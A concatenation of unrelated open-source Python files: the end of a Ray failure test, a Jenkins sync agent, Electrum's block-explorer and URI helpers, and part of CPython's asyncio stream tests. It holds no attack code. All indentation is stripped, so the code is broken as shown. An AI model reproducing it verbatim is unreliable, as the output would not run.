ray.get(child.sleep.remote())
else:
ray.get(sleep.options(resources={"child": 1}).remote())
def sleep(self):
time.sleep(1000)
def get_pid(self):
return os.getpid()
# Returns whether the "child" resource is available.
def child_resource_available():
p = probe.remote()
ready, _ = ray.wait([p], timeout=1)
return len(ready) > 0
# Test fate sharing if the parent process dies.
def test_process_failure(use_actors):
a = Actor.options(resources={"parent": 1}).remote()
pid = ray.get(a.get_pid.remote())
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
os.kill(pid, 9)
wait_for_condition(child_resource_available)
# Test fate sharing if the parent node dies.
def test_node_failure(node_to_kill, use_actors):
a = Actor.options(resources={"parent": 1}).remote()
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
cluster.remove_node(node_to_kill, allow_graceful=False)
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
wait_for_condition(child_resource_available)
return node_to_kill
if node_failure:
test_node_failure(node_to_kill, use_actors)
else:
test_process_failure(use_actors)
ray.state.state._check_connected()
keys = [
key for r in ray.state.state.redis_clients
for key in r.keys("WORKER_FAILURE*")
]
if node_failure:
assert len(keys) <= 1, len(keys)
else:
assert len(keys) <= 2, len(keys)
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"ping_gcs_rpc_server_max_retries": 100
}
}],
indirect=True)
def test_gcs_server_failiure_report(ray_start_regular, log_pubsub):
p = log_pubsub
# Get gcs server pid to send a signal.
all_processes = ray.worker._global_node.all_processes
gcs_server_process = all_processes["gcs_server"][0].process
gcs_server_pid = gcs_server_process.pid
os.kill(gcs_server_pid, signal.SIGBUS)
msg = None
cnt = 0
# wait for max 30 seconds.
while cnt < 3000 and not msg:
msg = p.get_message()
if msg is None:
time.sleep(0.01)
cnt += 1
continue
data = json.loads(ray.utils.decode(msg["data"]))
assert data["pid"] == "gcs_server"
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
jenkins_agent.py | # Copyright 2017 Arie Bregman
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import jenkins
import logging
from multiprocessing import Process
import re
import time
from rhoci.agent import agent
from rhoci.agent import update
import rhoci.jenkins.build as build_lib
import rhoci.jenkins.job as job_lib
import rhoci.models as models
from rhoci.db.base import db
from rhoci.rhosp.dfg import get_dfg_name
LOG = logging.getLogger(__name__)
class JenkinsAgent(agent.Agent):
def __init__(self, name, user, password, url, app):
super(JenkinsAgent, self).__init__(name)
self.user = user
self.password = password
self.url = url
self.app = app
self.pre_run_process = Process(target=self.pre_start)
try:
self.conn = jenkins.Jenkins(self.url, self.user, self.password)
self.active = True
except Exception as e:
LOG.info("Something went terribly wrong when " +
"starting Jenkins agent: %s" % e.message)
self.active = False
self.add_agent_to_db()
def start(self):
"""Start running the Jenkins agent."""
while True:
time.sleep(self.app.config['RHOCI_UPDATE_INTERVAL'])
LOG.info("Updating jobs")
with self.app.app_context():
update.shallow_jobs_update()
LOG.info("Update complete")
def pre_start(self):
"""Populate the database with information from Jenkins
Jobs - name, last build status, last build_number
Builds - Job name, Status, Number
"""
with self.app.app_context():
# If there is no update time, it means the application never
# contacted Jenkins so run update without additional
# If there was an update, check if one hour passed since
# last update
agent = models.Agent.query.filter_by(name=self.name).first()
if not agent.update_time or (agent.update_time -
datetime.datetime.utcnow() >
datetime.timedelta(minutes=59)):
# Update timestamp for last Jenkins update
models.Agent.query.filter_by(
name=self.name).update(dict(
update_time=datetime.datetime.utcnow()))
LOG.debug("Updated agent timestamp")
# Populate db with jobs
job_lib.populate_db_with_jobs(agent)
# In case application was restarted or crushed, check if active
# builds in DB are still active
build_lib.check_active_builds(self.conn)
def remove_jobs_from_db(self, jobs):
"""Removes jobs from DB that no longer exist on Jenkins."""
with self.app.app_context():
for job in jobs:
if not models.Job.query.filter_by(name=job):
LOG.debug("Removing job: %s from DB" % job)
def update_job_in_db(self, job):
last_build_result = "None"
with self.app.app_context():
try:
job_info = self.conn.get_job_info(job['name'])
last_build_number = build_lib.get_last_build_number(
job_info)
except Exception as e:
LOG.info("Unable to fetch information for %s: %s" % (
job['name'], e.message))
if last_build_number:
last_build_result = build_lib.get_build_status(
self.conn, job['name'], last_build_number)
db_build = models.Build(job=job['name'],
number=last_build_number,
status=last_build_result)
db.session.add(db_build)
db.session.commit()
# Update entry in database
models.Job.query.filter_by(
name=job['name']).update(
dict(last_build_number=last_build_number,
last_build_result=last_build_result))
db.session.commit()
LOG.debug("Updated job from %s: %s" % (self.name, job['name']))
def add_agent_to_db(self):
"""Adds the agent to the database."""
with self.app.app_context():
if not models.Agent.query.filter_by(name=self.name).count():
db_agent = models.Agent(name=self.name,
url=self.url,
password=self.password)
db.session.add(db_agent)
db.session.commit()
def get_job_type(self, name):
"""Returns job type based on its name."""
if 'phase1' in name:
return 'phase1'
elif 'phase2' in name:
return 'phase2'
elif 'dfg' in name:
dfg = get_dfg_name(name)
if (not models.DFG.query.filter_by(name=dfg).count() and
dfg.lower() != 'dfg'):
db_dfg = models.DFG(name=dfg)
db.session.add(db_dfg)
db.session.commit()
return 'dfg'
else:
return 'other'
def get_job_release(self, name):
m = re.search('-\d{1,2}', name)
return m.group().split('-')[1] if m else 0
|
web.py | # Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from decimal import Decimal
import os
import re
import shutil
import threading
import urllib
from .address import Address
from . import bitcoin
from .networks import NetworkConstants
from .util import format_satoshis_plain
mainnet_block_explorers = {
'Blockchair.com': ('https://blockchair.com/bitcoin-cash',
Address.FMT_LEGACY,
{'tx': 'transaction', 'addr': 'address'}),
}
testnet_block_explorers = {
'Blocktrail.com': ('https://www.blocktrail.com/tBCC',
Address.FMT_LEGACY,
{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
Address.FMT_LEGACY,
{'tx': 'tx', 'addr': 'address'}),
}
regtest_block_explorers = {
# TODO ADD EXPLORER
'Blocktrail.com': ('https://www.blocktrail.com/tBCC',
Address.FMT_LEGACY,
{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
Address.FMT_LEGACY,
{'tx': 'tx', 'addr': 'address'}),
}
def BE_info():
if NetworkConstants.TESTNET:
return testnet_block_explorers
if NetworkConstants.REGTEST:
return regtest_block_explorers
return mainnet_block_explorers
def BE_tuple(config):
return BE_info().get(BE_from_config(config))
def BE_from_config(config):
return config.get('block_explorer', 'Blockchair.com')
def BE_URL(config, kind, item):
be_tuple = BE_tuple(config)
if not be_tuple:
return
url_base, addr_fmt, parts = be_tuple
kind_str = parts.get(kind)
if not kind_str:
return
if kind == 'addr':
assert isinstance(item, Address)
item = item.to_string(addr_fmt)
return "/".join([url_base, kind_str, item])
def BE_sorted_list():
return sorted(BE_info())
def create_URI(addr, amount, message):
if not isinstance(addr, Address):
return ""
scheme, path = addr.to_URI_components()
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme=scheme,
netloc='', path=path, params='',
query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
if ':' not in uri:
# Test it's valid
Address.from_string(uri)
return {'address': uri}
u = urllib.parse.urlparse(uri)
# The scheme always comes back in lower case
if u.scheme != NetworkConstants.CASHADDR_PREFIX:
raise Exception("Not a {} URI".format(NetworkConstants.CASHADDR_PREFIX))
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
Address.from_string(address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow(10, k)
else:
amount = Decimal(am) * bitcoin.COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def check_www_dir(rdir):
if not os.path.exists(rdir):
os.mkdir(rdir)
index = os.path.join(rdir, 'index.html')
if not os.path.exists(index):
print_error("copying index.html")
src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
shutil.copy(src, index)
files = [
"https://code.jquery.com/jquery-1.9.1.min.js",
"https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
"https://code.jquery.com/ui/1.10.3/jquery-ui.js",
"https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
]
for URL in files:
path = urllib.parse.urlsplit(URL).path
filename = os.path.basename(path)
path = os.path.join(rdir, filename)
if not os.path.exists(path):
print_error("downloading ", URL)
urllib.request.urlretrieve(URL, path)
|
test_streams.py | """Tests for streams.py."""
import gc
import os
import queue
import pickle
import socket
import sys
import threading
import unittest
from unittest import mock
from test import support
try:
import ssl
except ImportError:
ssl = None
import asyncio
from test.test_asyncio import utils as test_utils
def tearDownModule():
asyncio.set_event_loop_policy(None)
class StreamTests(test_utils.TestCase):
DATA = b'line1\nline2\nline3\n'
def setUp(self):
super().setUp()
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
test_utils.run_briefly(self.loop)
self.loop.close()
gc.collect()
super().tearDown()
@mock.patch('asyncio.streams.events')
def test_ctor_global_loop(self, m_events):
stream = asyncio.StreamReader(_asyncio_internal=True)
self.assertIs(stream._loop, m_events.get_event_loop.return_value)
def _basetest_open_connection(self, open_connection_fut):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
reader, writer = self.loop.run_until_complete(open_connection_fut)
writer.write(b'GET / HTTP/1.0\r\n\r\n')
f = reader.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = reader.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
writer.close()
self.assertEqual(messages, [])
def test_open_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = asyncio.open_connection(*httpd.address,
loop=self.loop)
self._basetest_open_connection(conn_fut)
@support.skip_unless_bind_unix_socket
def test_open_unix_connection(self):
with test_utils.run_test_unix_server() as httpd:
conn_fut = asyncio.open_unix_connection(httpd.address,
loop=self.loop)
self._basetest_open_connection(conn_fut)
def _basetest_open_connection_no_loop_ssl(self, open_connection_fut):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
try:
reader, writer = self.loop.run_until_complete(open_connection_fut)
finally:
asyncio.set_event_loop(None)
writer.write(b'GET / HTTP/1.0\r\n\r\n')
f = reader.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
writer.close()
self.assertEqual(messages, [])
@unittest.skipIf(ssl is None, 'No ssl module')
def test_open_connection_no_loop_ssl(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
conn_fut = asyncio.open_connection(
*httpd.address,
ssl=test_utils.dummy_ssl_context(),
loop=self.loop)
self._basetest_open_connection_no_loop_ssl(conn_fut)
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_open_unix_connection_no_loop_ssl(self):
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
conn_fut = asyncio.open_unix_connection(
httpd.address,
ssl=test_utils.dummy_ssl_context(),
server_hostname='',
loop=self.loop)
self._basetest_open_connection_no_loop_ssl(conn_fut)
def _basetest_open_connection_error(self, open_connection_fut):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
reader, writer = self.loop.run_until_complete(open_connection_fut)
writer._protocol.connection_lost(ZeroDivisionError())
f = reader.read()
with self.assertRaises(ZeroDivisionError):
self.loop.run_until_complete(f)
writer.close()
test_utils.run_briefly(self.loop)
self.assertEqual(messages, [])
def test_open_connection_error(self):
with test_utils.run_test_server() as httpd:
conn_fut = asyncio.open_connection(*httpd.address,
loop=self.loop)
self._basetest_open_connection_error(conn_fut)
@support.skip_unless_bind_unix_socket
def test_open_unix_connection_error(self):
with test_utils.run_test_unix_server() as httpd:
conn_fut = asyncio.open_unix_connection(httpd.address,
loop=self.loop)
self._basetest_open_connection_error(conn_fut)
def test_feed_empty_data(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'')
self.assertEqual(b'', stream._buffer)
def test_feed_nonempty_data(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(self.DATA)
self.assertEqual(self.DATA, stream._buffer)
def test_read_zero(self):
# Read zero bytes.
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(self.DATA)
data = self.loop.run_until_complete(stream.read(0))
self.assertEqual(b'', data)
self.assertEqual(self.DATA, stream._buffer)
def test_read(self):
# Read bytes.
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
read_task = asyncio.Task(stream.read(30), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(self.DATA, data)
self.assertEqual(b'', stream._buffer)
def test_read_line_breaks(self):
# Read bytes without line breaks.
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'line1')
stream.feed_data(b'line2')
data = self.loop.run_until_complete(stream.read(5))
self.assertEqual(b'line1', data)
self.assertEqual(b'line2', stream._buffer)
def test_read_eof(self):
# Read bytes, stop at eof.
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
read_task = asyncio.Task(stream.read(1024), loop=self.loop)
def cb():
stream.feed_eof()
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(b'', data)
self.assertEqual(b'', stream._buffer)
def test_read_until_eof(self):
# Read all bytes until eof.
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
read_task = asyncio.Task(stream.read(-1), loop=self.loop)
def cb():
stream.feed_data(b'chunk1\n')
stream.feed_data(b'chunk2')
stream.feed_eof()
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(b'chunk1\nchunk2', data)
self.assertEqual(b'', stream._buffer)
def test_read_exception(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.read(2))
self.assertEqual(b'li', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.read(2))
def test_invalid_limit(self):
with self.assertRaisesRegex(ValueError, 'imit'):
asyncio.StreamReader(limit=0, loop=self.loop,
_asyncio_internal=True)
with self.assertRaisesRegex(ValueError, 'imit'):
asyncio.StreamReader(limit=-1, loop=self.loop,
_asyncio_internal=True)
def test_read_limit(self):
stream = asyncio.StreamReader(limit=3, loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'chunk')
data = self.loop.run_until_complete(stream.read(5))
self.assertEqual(b'chunk', data)
self.assertEqual(b'', stream._buffer)
def test_readline(self):
# Read one line. 'readline' will need to wait for the data
# to come from 'cb'
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'chunk1 ')
read_task = asyncio.Task(stream.readline(), loop=self.loop)
def cb():
stream.feed_data(b'chunk2 ')
stream.feed_data(b'chunk3 ')
stream.feed_data(b'\n chunk4')
self.loop.call_soon(cb)
line = self.loop.run_until_complete(read_task)
self.assertEqual(b'chunk1 chunk2 chunk3 \n', line)
self.assertEqual(b' chunk4', stream._buffer)
def test_readline_limit_with_existing_data(self):
# Read one line. The data is in StreamReader's buffer
# before the event loop is run.
stream = asyncio.StreamReader(limit=3, loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'li')
stream.feed_data(b'ne1\nline2\n')
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# The buffer should contain the remaining data after exception
self.assertEqual(b'line2\n', stream._buffer)
stream = asyncio.StreamReader(limit=3, loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'li')
stream.feed_data(b'ne1')
stream.feed_data(b'li')
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# No b'\n' at the end. The 'limit' is set to 3. So before
# waiting for the new data in buffer, 'readline' will consume
# the entire buffer, and since the length of the consumed data
# is more than 3, it will raise a ValueError. The buffer is
# expected to be empty now.
self.assertEqual(b'', stream._buffer)
def test_at_eof(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
self.assertFalse(stream.at_eof())
stream.feed_data(b'some data\n')
self.assertFalse(stream.at_eof())
self.loop.run_until_complete(stream.readline())
self.assertFalse(stream.at_eof())
stream.feed_data(b'some data\n')
stream.feed_eof()
self.loop.run_until_complete(stream.readline())
self.assertTrue(stream.at_eof())
def test_readline_limit(self):
# Read one line. StreamReaders are fed with data after
# their 'readline' methods are called.
stream = asyncio.StreamReader(limit=7, loop=self.loop,
_asyncio_internal=True)
def cb():
stream.feed_data(b'chunk1')
stream.feed_data(b'chunk2')
stream.feed_data(b'chunk3\n')
stream.feed_eof()
self.loop.call_soon(cb)
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# The buffer had just one line of data, and after raising
# a ValueError it should be empty.
self.assertEqual(b'', stream._buffer)
stream = asyncio.StreamReader(limit=7, loop=self.loop,
_asyncio_internal=True)
def cb():
stream.feed_data(b'chunk1')
stream.feed_data(b'chunk2\n')
stream.feed_data(b'chunk3\n')
stream.feed_eof()
self.loop.call_soon(cb)
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
self.assertEqual(b'chunk3\n', stream._buffer)
# check strictness of the limit
stream = asyncio.StreamReader(limit=7, loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'1234567\n')
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'1234567\n', line)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'12345678\n')
with self.assertRaises(ValueError) as cm:
self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'12345678')
with self.assertRaises(ValueError) as cm:
self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', stream._buffer)
def test_readline_nolimit_nowait(self):
# All needed data for the first 'readline' call will be
# in the buffer.
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(self.DATA[:6])
stream.feed_data(self.DATA[6:])
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'line1\n', line)
self.assertEqual(b'line2\nline3\n', stream._buffer)
def test_readline_eof(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'some data')
stream.feed_eof()
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'some data', line)
def test_readline_empty_eof(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_eof()
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', line)
def test_readline_read_byte_count(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(self.DATA)
self.loop.run_until_complete(stream.readline())
data = self.loop.run_until_complete(stream.read(7))
self.assertEqual(b'line2\nl', data)
self.assertEqual(b'ine3\n', stream._buffer)
def test_readline_exception(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'line\n', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
self.assertEqual(b'', stream._buffer)
def test_readuntil_separator(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
with self.assertRaisesRegex(ValueError, 'Separator should be'):
self.loop.run_until_complete(stream.readuntil(separator=b''))
def test_readuntil_multi_chunks(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'lineAAA')
data = self.loop.run_until_complete(stream.readuntil(separator=b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'lineAAA')
data = self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'lineAAAxxx')
data = self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'xxx', stream._buffer)
def test_readuntil_multi_chunks_1(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'QWEaa')
stream.feed_data(b'XYaa')
stream.feed_data(b'a')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'QWEaaXYaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'QWEaa')
stream.feed_data(b'XYa')
stream.feed_data(b'aa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'QWEaaXYaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'aaa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'aaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'Xaaa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'Xaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'XXX')
stream.feed_data(b'a')
stream.feed_data(b'a')
stream.feed_data(b'a')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'XXXaaa', data)
self.assertEqual(b'', stream._buffer)
def test_readuntil_eof(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'some dataAA')
stream.feed_eof()
with self.assertRaises(asyncio.IncompleteReadError) as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(cm.exception.partial, b'some dataAA')
self.assertIsNone(cm.exception.expected)
self.assertEqual(b'', stream._buffer)
def test_readuntil_limit_found_sep(self):
stream = asyncio.StreamReader(loop=self.loop, limit=3,
_asyncio_internal=True)
stream.feed_data(b'some dataAA')
with self.assertRaisesRegex(asyncio.LimitOverrunError,
'not found') as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'some dataAA', stream._buffer)
stream.feed_data(b'A')
with self.assertRaisesRegex(asyncio.LimitOverrunError,
'is found') as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'some dataAAA', stream._buffer)
def test_readexactly_zero_or_less(self):
# Read exact number of bytes (zero or less).
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(self.DATA)
data = self.loop.run_until_complete(stream.readexactly(0))
self.assertEqual(b'', data)
self.assertEqual(self.DATA, stream._buffer)
with self.assertRaisesRegex(ValueError, 'less than zero'):
self.loop.run_until_complete(stream.readexactly(-1))
self.assertEqual(self.DATA, stream._buffer)
def test_readexactly(self):
# Read exact number of bytes.
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
n = 2 * len(self.DATA)
read_task = asyncio.Task(stream.readexactly(n), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
stream.feed_data(self.DATA)
stream.feed_data(self.DATA)
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(self.DATA + self.DATA, data)
self.assertEqual(self.DATA, stream._buffer)
def test_readexactly_limit(self):
stream = asyncio.StreamReader(limit=3, loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'chunk')
data = self.loop.run_until_complete(stream.readexactly(5))
self.assertEqual(b'chunk', data)
self.assertEqual(b'', stream._buffer)
def test_readexactly_eof(self):
# Read exact number of bytes (eof).
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
n = 2 * len(self.DATA)
read_task = asyncio.Task(stream.readexactly(n), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
stream.feed_eof()
self.loop.call_soon(cb)
with self.assertRaises(asyncio.IncompleteReadError) as cm:
self.loop.run_until_complete(read_task)
self.assertEqual(cm.exception.partial, self.DATA)
self.assertEqual(cm.exception.expected, n)
self.assertEqual(str(cm.exception),
'18 bytes read on a total of 36 expected bytes')
self.assertEqual(b'', stream._buffer)
def test_readexactly_exception(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.readexactly(2))
self.assertEqual(b'li', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readexactly(2))
def test_exception(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
self.assertIsNone(stream.exception())
exc = ValueError()
stream.set_exception(exc)
self.assertIs(stream.exception(), exc)
def test_exception_waiter(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
@asyncio.coroutine
def set_err():
stream.set_exception(ValueError())
t1 = asyncio.Task(stream.readline(), loop=self.loop)
t2 = asyncio.Task(set_err(), loop=self.loop)
self.loop.run_until_complete(asyncio.wait([t1, t2]))
self.assertRaises(ValueError, t1.result)
def test_exception_cancel(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
t = asyncio.Task(stream.readline(), loop=self.loop)
test_utils.run_briefly(self.loop)
t.cancel()
test_utils.run_briefly(self.loop)
# The following line fails if set_exception() isn't careful.
stream.set_exception(RuntimeError('message'))
test_utils.run_briefly(self.loop)
self.assertIs(stream._waiter, None)
def test_start_server(self):
class MyServer:
def __init__(self, loop):
self.server = None
self.loop = loop
async def handle_client(self, client_reader, client_writer):
data = await client_reader.readline()
client_writer.write(data)
await client_writer.drain()
client_writer.close()
await client_writer.wait_closed()
def start(self):
sock = socket.create_server(('127.0.0.1', 0))
self.server = self.loop.run_until_complete(
asyncio.start_server(self.handle_client,
sock=sock,
loop=self.loop))
return sock.getsockname()
def handle_client_callback(self, client_reader, client_writer):
self.loop.create_task(self.handle_client(client_reader,
client_writer))
def start_callback(self):
sock = socket.create_server(('127.0.0.1', 0))
addr = sock.getsockname()
sock.close()
self.server = self.loop.run_until_complete(
asyncio.start_server(self.handle_client_callback,
host=addr[0], port=addr[1],
loop=self.loop))
return addr
def stop(self):
if self.server is not None:
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.server = None
async def client(addr):
reader, writer = await asyncio.open_connection(
*addr, loop=self.loop)
# send a line
writer.write(b"hello world!\n")
# read it back
msgback = await reader.readline()
writer.close()
await writer.wait_closed()
return msgback
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
# test the server variant with a coroutine as client handler
server = MyServer(self.loop)
addr = server.start()
msg = self.loop.run_until_complete(asyncio.Task(client(addr),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
# test the server variant with a callback as client handler
server = MyServer(self.loop)
addr = server.start_callback()
msg = self.loop.run_until_complete(asyncio.Task(client(addr),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
self.assertEqual(messages, [])
@support.skip_unless_bind_unix_socket
def test_start_unix_server(self):
class MyServer:
def __init__(self, loop, path):
self.server = None
self.loop = loop
self.path = path
async def handle_client(self, client_reader, client_writer):
data = await client_reader.readline()
client_writer.write(data)
await client_writer.drain()
client_writer.close()
await client_writer.wait_closed()
def start(self):
self.server = self.loop.run_until_complete(
asyncio.start_unix_server(self.handle_client,
path=self.path,
loop=self.loop))
def handle_client_callback(self, client_reader, client_writer):
self.loop.create_task(self.handle_client(client_reader,
client_writer))
def start_callback(self):
